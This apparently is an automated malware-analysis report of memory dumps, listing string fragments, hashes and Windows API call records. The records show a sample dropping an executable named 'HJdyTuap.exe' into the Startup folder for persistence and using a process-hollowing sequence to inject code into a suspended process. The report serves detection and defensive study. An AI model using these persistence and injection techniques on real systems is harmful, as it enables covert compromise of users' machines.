ose, xrefs: 05081040
etCu, xrefs: 05080EC9
2.dl, xrefs: 0508058A
ecti, xrefs: 05080A90
32.d, xrefs: 0508127A
ry, xrefs: 050808A9
tePr, xrefs: 050808E6
lenW, xrefs: 05080867
RtlC, xrefs: 05080DE3
lstr, xrefs: 0508085D
tTra, xrefs: 05080EDD
teVi, xrefs: 050802CF
reat, xrefs: 05080D48
NtAd, xrefs: 05080DA7
wnDl, xrefs: 050803B5
NtRe, xrefs: 050809D7
otec, xrefs: 05080881
Reso, xrefs: 050801E7
wcsc, xrefs: 05080FA0
strlenuser32.dlladvapi32.dll, xrefs: 05081348, 0508134B
ntin, xrefs: 05080D25
le, xrefs: 05080BA2
ss, xrefs: 05080836
tant, xrefs: 050812F1
.dll, xrefs: 050804DA
wnDl, xrefs: 050805A7
Cont, xrefs: 050807BA
pVie, xrefs: 05080A7C
dvap, xrefs: 05080508
mati, xrefs: 05080B6B
eNam, xrefs: 05080B34
Reso, xrefs: 050808C2
LdrL, xrefs: 05080F7D
Post, xrefs: 05081178
oadD, xrefs: 05080F87
uire, xrefs: 05080682
NtCr, xrefs: 050812B0
Proc, xrefs: 05081078
ey, xrefs: 0508064F
ddre, xrefs: 0508082C
en, xrefs: 05080CDE
eroM, xrefs: 05080913
rren, xrefs: 05080ED3
layE, xrefs: 05080CB0
oces, xrefs: 050808F0
tCre, xrefs: 050806B0
Cryp, xrefs: 050806F5
loca, xrefs: 050802C5
dll, xrefs: 05080558
sW, xrefs: 0508113C
teMu, xrefs: 05081356
i32., xrefs: 05080512
mati, xrefs: 0508033C
enMu, xrefs: 050812E7
Expa, xrefs: 05080AD1
urce, xrefs: 05080218
NtAl, xrefs: 050802BB
ueKe, xrefs: 05080BE8
LdrG, xrefs: 05080F3C
ls\a, xrefs: 050804FE
le, xrefs: 05080B7F
nfor, xrefs: 05080B61
wnDl, xrefs: 0508125C
Muta, xrefs: 050812C4
nsac, xrefs: 05080EE7
NtOp, xrefs: 050805EC
ageB, xrefs: 05080FC3
DefW, xrefs: 0508114B
sour, xrefs: 0508023C
Cryp, xrefs: 05080750
\Kno, xrefs: 05080476
ken, xrefs: 05080DD9
ory, xrefs: 050802ED
NtPr, xrefs: 05080877
onFi, xrefs: 05080B75
Fill, xrefs: 050811BA
eate, xrefs: 050812BA
le32, xrefs: 050805BB
NtDe, xrefs: 05080CA6
eUse, xrefs: 05080E42
User, xrefs: 05080C65
rmin, xrefs: 0508093A
\ntd, xrefs: 050803C9
l, xrefs: 050812A7
Thre, xrefs: 050809EB
\Kno, xrefs: 05080526
tRel, xrefs: 050807A6
ZwRo, xrefs: 05080F01
s, xrefs: 05080315
KeyP, xrefs: 05080C6F
urce, xrefs: 05080269
\use, xrefs: 05080494
l, xrefs: 0508046D
NtCr, xrefs: 05080CED
py, xrefs: 05080665
Cryp, xrefs: 0508066E
sTok, xrefs: 05080D8E
xecu, xrefs: 05080CBA
eA, xrefs: 05080B3E
ead, xrefs: 05080D66
llba, xrefs: 05080F0B
Find, xrefs: 050801DD
en, xrefs: 05080D98
NtQu, xrefs: 050810A6
mete, xrefs: 05080E15
Show, xrefs: 050810D3
ls32, xrefs: 05081266
tStr, xrefs: 05080AF9
mInf, xrefs: 05080377
NtQu, xrefs: 05080279
ss, xrefs: 05080F6E
Libr, xrefs: 05080807
y, xrefs: 05080927
enPr, xrefs: 05080301
eate, xrefs: 05081064
ad, xrefs: 05080A2C
tHas, xrefs: 050806D8
yste, xrefs: 0508036D
ess, xrefs: 05081082
iewO, xrefs: 050809B3
text, xrefs: 05080A4F
troy, xrefs: 05080736
text, xrefs: 05080A18
ad, xrefs: 05080A63
Lock, xrefs: 05080255
GetS, xrefs: 05080363
esTo, xrefs: 05080DCF
ls\k, xrefs: 0508053A
nfor, xrefs: 05080332
wOfS, xrefs: 05080A86
rs, xrefs: 05080E1F
tdll, xrefs: 050804D0
\Kno, xrefs: 050803EC
Crea, xrefs: 0508134C
RtlC, xrefs: 05080E2E
et, xrefs: 05080C9D
Inst, xrefs: 05081238
py, xrefs: 05081051
ctio, xrefs: 05080EAC
.dll, xrefs: 050805C5
\Kno, xrefs: 05080431
ll, xrefs: 05081284
Key, xrefs: 05080627
memc, xrefs: 0508065E
\Kno, xrefs: 0508059D
on, xrefs: 05080A9A
cess, xrefs: 05080E01
NtOp, xrefs: 05080BB1
mems, xrefs: 05080C93
cW, xrefs: 05081169
wcst, xrefs: 0508108C
urce, xrefs: 050801F1
rypt, xrefs: 05080764
eUse, xrefs: 05080D52
enFi, xrefs: 05080BBB
lize, xrefs: 0508120B
n, xrefs: 05080F33
\Kno, xrefs: 050803AB
\Ole, xrefs: 05081270
Key, xrefs: 05080792
ndow, xrefs: 0508110A
sact, xrefs: 05080E84
adVi, xrefs: 050807D8
ion, xrefs: 05080AC7
Mess, xrefs: 0508118C
y, xrefs: 05080600
NtCr, xrefs: 0508105A
NtOp, xrefs: 05080E98
enKe, xrefs: 050805F6
itia, xrefs: 05081201
l, xrefs: 05080428
Mess, xrefs: 05080FB9
wnDl, xrefs: 05080480
NtRe, xrefs: 050807CE
at, xrefs: 05080C8A
lMem, xrefs: 050802E3
eate, xrefs: 05080AB3
ease, xrefs: 050807B0
tCon, xrefs: 05080A45
NtFr, xrefs: 05081004
tion, xrefs: 050802AB
rent, xrefs: 05080C5B
Thre, xrefs: 05080A59
Cryp, xrefs: 050806A6
mory, xrefs: 0508098F
Sect, xrefs: 05080ABD
urce, xrefs: 050808CC
Load, xrefs: 05080800
dll, xrefs: 0508051C
wnDl, xrefs: 050804BC
NtOp, xrefs: 050812DD
ion, xrefs: 05080E8E
ls32, xrefs: 0508048A
W, xrefs: 05080B0D
Thre, xrefs: 05080D01
GetP, xrefs: 05080818
wnDl, xrefs: 050804F4
enSe, xrefs: 05080EA2
tion, xrefs: 050809C7
eate, xrefs: 05080CF7
iveK, xrefs: 05080709
Wind, xrefs: 050810DD
2.dl, xrefs: 05080463
ecti, xrefs: 050810BA
o, xrefs: 05080381
Cryp, xrefs: 050806CE
Cont, xrefs: 0508068C
kernel32.dll, xrefs: 0508137C, 0508137F
ctio, xrefs: 05080F29

Memory Dump Source

Source File: 00000000.00000002.505605421.0000000005080000.00000040.00000001.sdmp, Offset: 05080000, based on PE: false

Similarity

API ID: Section$OpenView
String ID: .dll$.dll$.dll$2.dl$2.dl$2.dl$2.dl$32.d$Begi$Clas$CoCr$CoIn$Cont$Cont$Crea$Crea$Crea$Cryp$Cryp$Cryp$Cryp$Cryp$Cryp$Cryp$Cryp$DefW$EndP$Ex$ExW$Expa$File$Fill$Find$Free$GetM$GetP$GetS$Hash$Inst$IsWo$KERNEL32.DLL$Key$Key$KeyP$LdrG$LdrL$Libr$Load$Load$Lock$Memo$Mess$Mess$Muta$NtAd$NtAl$NtCl$NtCo$NtCr$NtCr$NtCr$NtCr$NtCr$NtDe$NtEn$NtFr$NtGe$NtMa$NtOp$NtOp$NtOp$NtOp$NtOp$NtOp$NtPr$NtQu$NtQu$NtQu$NtQu$NtQu$NtRe$NtRe$NtRe$NtSe$NtSe$NtTe$NtWr$NtWr$Ole3$Para$Post$Priv$Proc$Quit$Rect$Regi$Reso$Reso$Reso$Reso$RtlC$RtlC$RtlC$RtlF$RtlS$RtlZ$Sect$Show$Size$Thre$Thre$Thre$Thre$Tran$User$User$W$W$Wind$ZwCr$ZwRo$ZwUn$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Ole$\adv$\ker$\ntd$\use$a$ad$ad$ad$adEx$adFi$adVi$age$ageB$aint$alMe$alue$ance$ansa$api3$aryA$ash$at$ateH$ateK$ateP$ath$cW$ce$cess$cess$ckTr$ctio$ctio$ddre$ddre$dll$dll$dll$dvap$eA$eFil$eNam$ePro$eUse$eUse$ead$ease$eate$eate$eate$eate$eate$eate$eate$ecti$ecti$eeVi$emor$en$en$enFi$enKe$enMu$enPr$enPr$enSe$erne$eroM$eryI$eryI$eryS$eryS$eryV$esTo$ess$et$etCu$etPr$ext$extW$ey$ey$fSec$hDat$i32.$iewO$ile$ileg$indo$ings$ion$ion$irtu$iteF$iteV$itia$iveK$just$ken$kernel32.dll$l$l$l$l$l32.$lMem$lMem$lMem$layE$le$le$le$le32$lenW$lize$ll$ll$ll$ll.d$llba$loca$ls32$ls32$ls32$ls32$ls32$ls\O$ls\a$ls\k$ls\n$ls\u$lstr$mInf$mInf$mapV$mati$mati$mbstowcs$memc$mems$mete$mory$mp$n$n$nPai$ndEn$ndow$nel3$nfor$nfor$nmen$nsac$nt$nt$ntin$o$oadD$oced$oces$oces$oces$oces$odul$ofRe$ombs$on$on$onFi$onPr$orma$orma$ory$ory$ory$ose$otec$ow$oxA$pVie$py$py$r32.$rPro$rThr$reat$reat$reat$rent$rmin$rocA$roce$roce$rren$rs$rtua$rtua$rtua$ry$rypt$s$s$sTok$sW$sW$sact$ser3$sour$ss$ss$ss$ss$ster$strlenuser32.dlladvapi32.dll$sume$tAcq$tCon$tCon$tCre$tCur$tDec$tDer$tDes$tDes$tHas$tRel$tStr$tTra$tVal$tVir$tant$tdll$teMu$tePr$teVi$teWi$texW$text$text$tion$tion$tion$tion$troy$troy$tual$ue$ueKe$uire$umer$urce$urce$urce$urce$ureA$viro$w64P$wOfS$wPro$wcsc$wcsc$wcsc$wcsl$wcst$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$xecu$y$y$y$yste$yste
API String ID: 2380476227-789266925
Opcode ID: e1c8b8bd4b5ecb10a97f64f7ee6ba6fe0aa344d9b0ca8cf844e0ae7bf0994be2
Instruction ID: 31b785d82b309b36ef42df0a1d90e74f105077c0b218b4d06d6e23628bf2e961
Opcode Fuzzy Hash: e1c8b8bd4b5ecb10a97f64f7ee6ba6fe0aa344d9b0ca8cf844e0ae7bf0994be2
Instruction Fuzzy Hash: F5D2BFB1C0526C8ACB21DFA1DD89BDEBBB8BF15701F1081DAD188AB215DB319B84CF55

Uniqueness

Uniqueness Score: -1.00%

Function 050901CB, Relevance: 517.4, Strings: 413, Instructions: 1134COMMON

Download Yara Rule

Strings

itia, xrefs: 05091201
NtDe, xrefs: 05090CA6
NtPr, xrefs: 05090877
ls32, xrefs: 05090400
rtua, xrefs: 050902D9
enKe, xrefs: 050905F6
RtlC, xrefs: 05090D3E
sact, xrefs: 05090E84
ead, xrefs: 05090D66
Thre, xrefs: 05090A22
lMem, xrefs: 050902E3
tCre, xrefs: 050906B0
wnDl, xrefs: 050903F6
ateH, xrefs: 050906BA
Load, xrefs: 05090204
\Kno, xrefs: 05090431
nel3, xrefs: 05090459
Regi, xrefs: 0509111E
wOfS, xrefs: 05090A86
File, xrefs: 05090C0F
rtua, xrefs: 05091018
NtQu, xrefs: 05090B4D
oced, xrefs: 05090F50
Thre, xrefs: 050909EB
.dll, xrefs: 050905C5
Quit, xrefs: 05091182
IsWo, xrefs: 05090FD7
NtRe, xrefs: 05090B8E
NtWr, xrefs: 05090967
adEx, xrefs: 05090D0B
Find, xrefs: 050901DD
ls32, xrefs: 05091266
mp, xrefs: 05090FAA
tStr, xrefs: 05090AF9
onFi, xrefs: 05090B75
alMe, xrefs: 05090985
wcsl, xrefs: 05090CD4
tCur, xrefs: 05090C51
ExW, xrefs: 05091114
Size, xrefs: 05090228
\Kno, xrefs: 050904B2
odul, xrefs: 05090B20
eate, xrefs: 05090CF7
Ex, xrefs: 05091215
at, xrefs: 05090C8A
NtMa, xrefs: 05090A72
kernel32.dll, xrefs: 0509137C, 0509137F
tion, xrefs: 05090EF1
ad, xrefs: 05090A63
rocA, xrefs: 05090822
nt, xrefs: 050911E8
uire, xrefs: 05090682
enFi, xrefs: 05090BBB
ntin, xrefs: 05090D25
ureA, xrefs: 05090F5A
viro, xrefs: 05090AE5
NtCr, xrefs: 05090BFB
eate, xrefs: 05090C05
NtCo, xrefs: 05090D1B
tant, xrefs: 050912F1
oxA, xrefs: 05090FCD
wnDl, xrefs: 050904BC
Sect, xrefs: 05090ABD
\Kno, xrefs: 05090526
Tran, xrefs: 05090E7A
NtSe, xrefs: 05090BD4
s, xrefs: 05090315
teVi, xrefs: 050902CF
ls32, xrefs: 0509048A
Thre, xrefs: 05090D01
wnDl, xrefs: 050904F4
NtEn, xrefs: 05090631
tdll, xrefs: 050904D0
Wind, xrefs: 050910DD
Lock, xrefs: 05090255
NtQu, xrefs: 05090609
Rect, xrefs: 050911C4
rThr, xrefs: 05090D5C
fSec, xrefs: 050909BD
Expa, xrefs: 05090AD1
KeyP, xrefs: 05090C6F
otec, xrefs: 05090881
ckTr, xrefs: 05090F15
eroM, xrefs: 05090913
ory, xrefs: 050902ED
Crea, xrefs: 050908DC
ster, xrefs: 05091128
tAcq, xrefs: 05090678
eryI, xrefs: 05090328
LdrG, xrefs: 05090F3C
aryA, xrefs: 0509080E
indo, xrefs: 05091155
Cryp, xrefs: 0509066E
\ntd, xrefs: 050903C9
Reso, xrefs: 050901E7
Para, xrefs: 05090E0B
tion, xrefs: 050902AB
rtua, xrefs: 050907E2
mInf, xrefs: 05090297
i32., xrefs: 05090512
dll, xrefs: 050904A8
ext, xrefs: 050907C4
ath, xrefs: 05090C79
NtOp, xrefs: 050902F7
wnDl, xrefs: 0509125C
\Kno, xrefs: 05090476
rypt, xrefs: 05090764
lMem, xrefs: 050907EC
NtRe, xrefs: 050909D7
o, xrefs: 05090381
.dll, xrefs: 050904DA
l, xrefs: 0509046D
\Kno, xrefs: 050903AB
ow, xrefs: 050910E7
iteV, xrefs: 05090971
wnDl, xrefs: 0509056C
Key, xrefs: 05090792
ZwUn, xrefs: 0509099F
sume, xrefs: 050909E1
enMu, xrefs: 050912E7
ls32, xrefs: 05090445
Mess, xrefs: 0509118C
ombs, xrefs: 05091096
EndP, xrefs: 050911A0
ePro, xrefs: 05090DF7
Crea, xrefs: 050910F6
Cryp, xrefs: 05090750
llba, xrefs: 05090F0B
mory, xrefs: 0509098F
py, xrefs: 05091051
adFi, xrefs: 05090B98
NtOp, xrefs: 050912DD
Reso, xrefs: 050908C2
eUse, xrefs: 05090E42
NtAl, xrefs: 050902BB
dll, xrefs: 0509051C
Proc, xrefs: 05091078
ss, xrefs: 05090836
ileg, xrefs: 05090DC5
Memo, xrefs: 0509089F
Libr, xrefs: 05090807
enPr, xrefs: 05090301
eA, xrefs: 05090B3E
Cryp, xrefs: 050906A6
a, xrefs: 050906EC
GetS, xrefs: 05090363
ings, xrefs: 05090B03
User, xrefs: 0509106E
ls\a, xrefs: 050904FE
NtFr, xrefs: 05091004
ateK, xrefs: 05090645
Thre, xrefs: 05090A59
orma, xrefs: 050902A1
mbstowcs, xrefs: 05091371, 05091374
Load, xrefs: 05090800
tDec, xrefs: 0509075A
ory, xrefs: 050907F6
lMem, xrefs: 05091022
y, xrefs: 05090600
wPro, xrefs: 0509115F
GetP, xrefs: 05090818
just, xrefs: 05090DB1
NtOp, xrefs: 050905EC
CoCr, xrefs: 05091224
wnDl, xrefs: 0509043B
Cryp, xrefs: 050906F5
nPai, xrefs: 050911DE
ls\O, xrefs: 050905B1
GetM, xrefs: 05090B16
tion, xrefs: 05090CC4
l, xrefs: 05090594
wcst, xrefs: 0509108C
nfor, xrefs: 05090332
2.dl, xrefs: 0509058A
2.dl, xrefs: 05090463
le, xrefs: 05090BA2
rs, xrefs: 05090E1F
LdrL, xrefs: 05090F7D
irtu, xrefs: 0509097B
Cont, xrefs: 050907BA
enSe, xrefs: 05090EA2
tual, xrefs: 05090895
tVal, xrefs: 05090BDE
\Kno, xrefs: 050904EA
nfor, xrefs: 05090B61
tRel, xrefs: 050907A6
ken, xrefs: 05090DD9
tCon, xrefs: 05090A0E
mati, xrefs: 0509033C
ls\u, xrefs: 05090576
Show, xrefs: 050910D3
ue, xrefs: 05090D2F
ser3, xrefs: 05090580
texW, xrefs: 05091360
layE, xrefs: 05090CB0
nsac, xrefs: 05090EE7
CoIn, xrefs: 050911F7
mInf, xrefs: 05090377
tVir, xrefs: 0509088B
text, xrefs: 05090A18
ZwRo, xrefs: 05090F01
tTra, xrefs: 05090EDD
Cryp, xrefs: 05090722
RtlC, xrefs: 05090DE3
reat, xrefs: 05090DED
nt, xrefs: 050912CE
ctio, xrefs: 05090EAC
l32., xrefs: 0509054E
ueKe, xrefs: 05090BE8
ey, xrefs: 0509064F
en, xrefs: 05090D98
ose, xrefs: 05091040
ion, xrefs: 05090AC7
Reso, xrefs: 0509020E
age, xrefs: 05091196
NtOp, xrefs: 05090E98
\Ole, xrefs: 05091270
NtGe, xrefs: 05090A3B
hDat, xrefs: 050906E2
Crea, xrefs: 0509134C
ss, xrefs: 05090FF5
ion, xrefs: 05090E8E
api3, xrefs: 05090414
tDes, xrefs: 0509077E
iewO, xrefs: 050909B3
dvap, xrefs: 05090508
ey, xrefs: 05090713
mapV, xrefs: 050909A9
rPro, xrefs: 05090E4C
ll, xrefs: 050903DD
Clas, xrefs: 05091132
y, xrefs: 05090BF2
NtAd, xrefs: 05090DA7
wnDl, xrefs: 050905A7
en, xrefs: 05090CDE
tion, xrefs: 050909C7
on, xrefs: 050910C4
eNam, xrefs: 05090B34
urce, xrefs: 05090218
tHas, xrefs: 050906D8
RtlS, xrefs: 05090EBF
Cryp, xrefs: 050906CE
iteF, xrefs: 05090C29
ecti, xrefs: 050910BA
Ole3, xrefs: 05091293
ad, xrefs: 050909F5
tePr, xrefs: 050908E6
rent, xrefs: 05090C5B
eFil, xrefs: 05090B2A
nmen, xrefs: 05090AEF
ry, xrefs: 050908A9
NtCr, xrefs: 050912B0
adVi, xrefs: 050907D8
w64P, xrefs: 05090FE1
py, xrefs: 05090665
NtOp, xrefs: 05090BB1
User, xrefs: 05090C65
oces, xrefs: 0509030B
eate, xrefs: 05090AB3
yste, xrefs: 0509028D
tDes, xrefs: 0509072C
s, xrefs: 0509035A
rren, xrefs: 05090ED3
troy, xrefs: 05090788
sW, xrefs: 050908FA
eate, xrefs: 05090E70
ateP, xrefs: 05090944
NtCl, xrefs: 05091036
cess, xrefs: 05090E01
Priv, xrefs: 05090DBB
eUse, xrefs: 05090D52
eryV, xrefs: 05090613
oces, xrefs: 05090D84
ce, xrefs: 05090246
ls\n, xrefs: 050904C6
\ker, xrefs: 0509044F
y, xrefs: 05090927
Key, xrefs: 05090627
oces, xrefs: 050908F0
eate, xrefs: 05091064
wnDl, xrefs: 05090530
iveK, xrefs: 05090709
NtQu, xrefs: 05090279
\adv, xrefs: 0509040A
NtCr, xrefs: 05090AA9
ll, xrefs: 05090F91
W, xrefs: 050901FB
ss, xrefs: 05090958
sour, xrefs: 0509023C
ddre, xrefs: 0509082C
Inst, xrefs: 05091238
Free, xrefs: 050908B8
strlenuser32.dlladvapi32.dll, xrefs: 05091348, 0509134B
erne, xrefs: 05090544
lstr, xrefs: 0509085D
etPr, xrefs: 05090F46
teWi, xrefs: 05091100
eryS, xrefs: 05090283
Cont, xrefs: 0509068C
Hash, xrefs: 05090740
pVie, xrefs: 05090A7C
Post, xrefs: 05091178
memc, xrefs: 0509065E
2.dl, xrefs: 0509129D
Cryp, xrefs: 05090774
32.d, xrefs: 0509127A
RtlC, xrefs: 05090E2E
etCu, xrefs: 05090EC9
oadD, xrefs: 05090F87
ecti, xrefs: 05090A90
ZwCr, xrefs: 05090E66
mems, xrefs: 05090C93
reat, xrefs: 05090E38
ad, xrefs: 05090A2C
\Kno, xrefs: 05090562
eryS, xrefs: 050910B0
ess, xrefs: 05091082
enPr, xrefs: 05090D7A
eate, xrefs: 0509122E
Begi, xrefs: 050911D4
n, xrefs: 05090EB6
ofRe, xrefs: 05090232
wnDl, xrefs: 05090480
aint, xrefs: 050911AA
ls\k, xrefs: 0509053A
W, xrefs: 05090B0D
\Kno, xrefs: 0509059D
NtRe, xrefs: 050907CE
et, xrefs: 05090C9D
ease, xrefs: 050907B0
NtQu, xrefs: 050910A6
dll, xrefs: 05090558
le32, xrefs: 050905BB
wnDl, xrefs: 050903B5
ageB, xrefs: 05090FC3
RtlZ, xrefs: 05090909
ansa, xrefs: 05090F1F
urce, xrefs: 050908CC
urce, xrefs: 050901F1
umer, xrefs: 0509063B
wcsc, xrefs: 0509104A
RtlF, xrefs: 05090C3D
ory, xrefs: 0509102C
n, xrefs: 05090F33
r32., xrefs: 0509049E
wcsc, xrefs: 05090FA0
NtTe, xrefs: 05090930
l, xrefs: 05090428
ddre, xrefs: 05090F64
NtCr, xrefs: 05090CED
.dll, xrefs: 05090853
ash, xrefs: 050906C4
eeVi, xrefs: 0509100E
emor, xrefs: 0509091D
ss, xrefs: 05090F6E
KERNEL32.DLL, xrefs: 05091392, 05091398
le, xrefs: 05090BC5
on, xrefs: 05090A9A
mati, xrefs: 05090B6B
Reso, xrefs: 0509025F
2.dl, xrefs: 0509041E
urce, xrefs: 05090269
sW, xrefs: 0509113C
esTo, xrefs: 05090DCF
\Kno, xrefs: 050903EC
cess, xrefs: 05090E56
ile, xrefs: 05090C33
sTok, xrefs: 05090D8E
cW, xrefs: 05091169
lize, xrefs: 0509120B
extW, xrefs: 05090696
NtWr, xrefs: 05090C1F
NtSe, xrefs: 05090A04
lenW, xrefs: 05090867
Cryp, xrefs: 0509079C
mete, xrefs: 05090E15
le, xrefs: 05090B7F
Muta, xrefs: 050912C4
yste, xrefs: 0509036D
Mess, xrefs: 05090FB9
text, xrefs: 05090A4F
alue, xrefs: 0509061D
DefW, xrefs: 0509114B
xecu, xrefs: 05090CBA
NtOp, xrefs: 05090D70
ndow, xrefs: 0509110A
ctio, xrefs: 05090F29
ance, xrefs: 05091242
\use, xrefs: 05090494
troy, xrefs: 05090736
NtQu, xrefs: 0509031E
rmin, xrefs: 0509093A
NtCr, xrefs: 0509105A
oces, xrefs: 05090350
Fill, xrefs: 050911BA
reat, xrefs: 05090D48
eryI, xrefs: 05090B57
orma, xrefs: 05090C47
ls32, xrefs: 050903BF
\Kno, xrefs: 05091252
wcsc, xrefs: 05090C83
teMu, xrefs: 05091356
l, xrefs: 050912A7
ll, xrefs: 05091284
ndEn, xrefs: 05090ADB
eate, xrefs: 050912BA
ll.d, xrefs: 050903D3
tDer, xrefs: 050906FF
roce, xrefs: 0509094E
roce, xrefs: 05090FEB
loca, xrefs: 050902C5
onPr, xrefs: 05090346
tCon, xrefs: 05090A45

Memory Dump Source

Source File: 00000000.00000002.505634719.0000000005090000.00000040.00000001.sdmp, Offset: 05090000, based on PE: false

Similarity

API ID: Section$OpenView
String ID: .dll$.dll$.dll$2.dl$2.dl$2.dl$2.dl$32.d$Begi$Clas$CoCr$CoIn$Cont$Cont$Crea$Crea$Crea$Cryp$Cryp$Cryp$Cryp$Cryp$Cryp$Cryp$Cryp$DefW$EndP$Ex$ExW$Expa$File$Fill$Find$Free$GetM$GetP$GetS$Hash$Inst$IsWo$KERNEL32.DLL$Key$Key$KeyP$LdrG$LdrL$Libr$Load$Load$Lock$Memo$Mess$Mess$Muta$NtAd$NtAl$NtCl$NtCo$NtCr$NtCr$NtCr$NtCr$NtCr$NtDe$NtEn$NtFr$NtGe$NtMa$NtOp$NtOp$NtOp$NtOp$NtOp$NtOp$NtPr$NtQu$NtQu$NtQu$NtQu$NtQu$NtRe$NtRe$NtRe$NtSe$NtSe$NtTe$NtWr$NtWr$Ole3$Para$Post$Priv$Proc$Quit$Rect$Regi$Reso$Reso$Reso$Reso$RtlC$RtlC$RtlC$RtlF$RtlS$RtlZ$Sect$Show$Size$Thre$Thre$Thre$Thre$Tran$User$User$W$W$Wind$ZwCr$ZwRo$ZwUn$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Ole$\adv$\ker$\ntd$\use$a$ad$ad$ad$adEx$adFi$adVi$age$ageB$aint$alMe$alue$ance$ansa$api3$aryA$ash$at$ateH$ateK$ateP$ath$cW$ce$cess$cess$ckTr$ctio$ctio$ddre$ddre$dll$dll$dll$dvap$eA$eFil$eNam$ePro$eUse$eUse$ead$ease$eate$eate$eate$eate$eate$eate$eate$ecti$ecti$eeVi$emor$en$en$enFi$enKe$enMu$enPr$enPr$enSe$erne$eroM$eryI$eryI$eryS$eryS$eryV$esTo$ess$et$etCu$etPr$ext$extW$ey$ey$fSec$hDat$i32.$iewO$ile$ileg$indo$ings$ion$ion$irtu$iteF$iteV$itia$iveK$just$ken$kernel32.dll$l$l$l$l$l32.$lMem$lMem$lMem$layE$le$le$le$le32$lenW$lize$ll$ll$ll$ll.d$llba$loca$ls32$ls32$ls32$ls32$ls32$ls\O$ls\a$ls\k$ls\n$ls\u$lstr$mInf$mInf$mapV$mati$mati$mbstowcs$memc$mems$mete$mory$mp$n$n$nPai$ndEn$ndow$nel3$nfor$nfor$nmen$nsac$nt$nt$ntin$o$oadD$oced$oces$oces$oces$oces$odul$ofRe$ombs$on$on$onFi$onPr$orma$orma$ory$ory$ory$ose$otec$ow$oxA$pVie$py$py$r32.$rPro$rThr$reat$reat$reat$rent$rmin$rocA$roce$roce$rren$rs$rtua$rtua$rtua$ry$rypt$s$s$sTok$sW$sW$sact$ser3$sour$ss$ss$ss$ss$ster$strlenuser32.dlladvapi32.dll$sume$tAcq$tCon$tCon$tCre$tCur$tDec$tDer$tDes$tDes$tHas$tRel$tStr$tTra$tVal$tVir$tant$tdll$teMu$tePr$teVi$teWi$texW$text$text$tion$tion$tion$tion$troy$troy$tual$ue$ueKe$uire$umer$urce$urce$urce$urce$ureA$viro$w64P$wOfS$wPro$wcsc$wcsc$wcsc$wcsl$wcst$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$xecu$y$y$y$yste$yste
API String ID: 2380476227-789266925
Opcode ID: 4197db9f150f0316b6c37499bb492c3d7884a7e4a752e5eaa95b81e883f7899f
Instruction ID: 0b551809ce985b3757764335cfec2bf35cdd274782ae0a88c4412d56026700dd
Opcode Fuzzy Hash: 4197db9f150f0316b6c37499bb492c3d7884a7e4a752e5eaa95b81e883f7899f
Instruction Fuzzy Hash: 6AD2BFB1C0526C8ACF21DFA19D89BCEBBB8BF55701F1081DAD148AB215DB319B84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 05081D7F, Relevance: 19.5, APIs: 3, Strings: 8, Instructions: 209filenativeCOMMON

Download Yara Rule

APIs

Part of subcall function 05081C2B: NtQueryInformationProcess.NTDLL(000000FF,00000000,?,00000018,00000000), ref: 05081C6F
Part of subcall function 05081C2B: NtOpenFile.NTDLL(?,00120089,?,?,00000001,00000040), ref: 05081CFF
Part of subcall function 05081C2B: NtAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00003000,00000004), ref: 05081D3B

NtOpenFile.NTDLL(?,00120089,?,?,00000001,00000040), ref: 05081F6A
NtCreateFile.NTDLL(?,00120116,?,?,00000000,00000080,00000000,00000005,00000040,00000000,00000000), ref: 05082015
NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000), ref: 05082048

Strings

en, xrefs: 05081FA4
\??\, xrefs: 05081E7D, 05081E80
wcsl, xrefs: 05081F9D
wcsl, xrefs: 05081EF5
\??\, xrefs: 05081E8E, 05081E94
en, xrefs: 05081EFC
%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe, xrefs: 05081E14, 05081E17
\??\, xrefs: 05082059

Memory Dump Source

Source File: 00000000.00000002.505605421.0000000005080000.00000040.00000001.sdmp, Offset: 05080000, based on PE: false

Similarity

API ID: File$Open$AllocateCreateInformationMemoryProcessQueryVirtualWrite
String ID: %appdata%\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe$\??\$\??\$\??\$en$en$wcsl$wcsl
API String ID: 2302177389-3011451884
Opcode ID: 4c2eb43af622bb57117c5c74932a5e8d34e257fcc8bc93f0bc25276c3d265d2d
Instruction ID: 15f12f8129bd0add56ce0baae8834a6b05655168cbae3956d75102ce3efa0dd2
Opcode Fuzzy Hash: 4c2eb43af622bb57117c5c74932a5e8d34e257fcc8bc93f0bc25276c3d265d2d
Instruction Fuzzy Hash: 6891E4B2D002599FDB21DFA4DC85BEEBBB8BF09700F10419AE519E7251DB309A84CF65

Uniqueness

Uniqueness Score: -1.00%

Function 05091C09, Relevance: 15.2, APIs: 10, Instructions: 225nativethreadprocessCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 05091CB7
NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 05091CDC
NtReadVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 05091CF6
NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 05091D41
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 05091D66
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 05091DA9
NtWriteVirtualMemory.NTDLL(?,?,?,00000004,?), ref: 05091E36
NtGetContextThread.NTDLL(?,?), ref: 05091E50
NtSetContextThread.NTDLL(?,00010007), ref: 05091E74
NtResumeThread.NTDLL(?,00000000), ref: 05091E86

Memory Dump Source

Source File: 00000000.00000002.505634719.0000000005090000.00000040.00000001.sdmp, Offset: 05090000, based on PE: false

Similarity

API ID: SectionThread$ContextCreateMemoryProcessViewVirtual$InformationQueryReadResumeWrite
String ID:
API String ID: 3307612235-0
Opcode ID: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
Instruction ID: df6defc32669564c603356bd4ad8b34419df61027f803b280dfb2097c563c19b
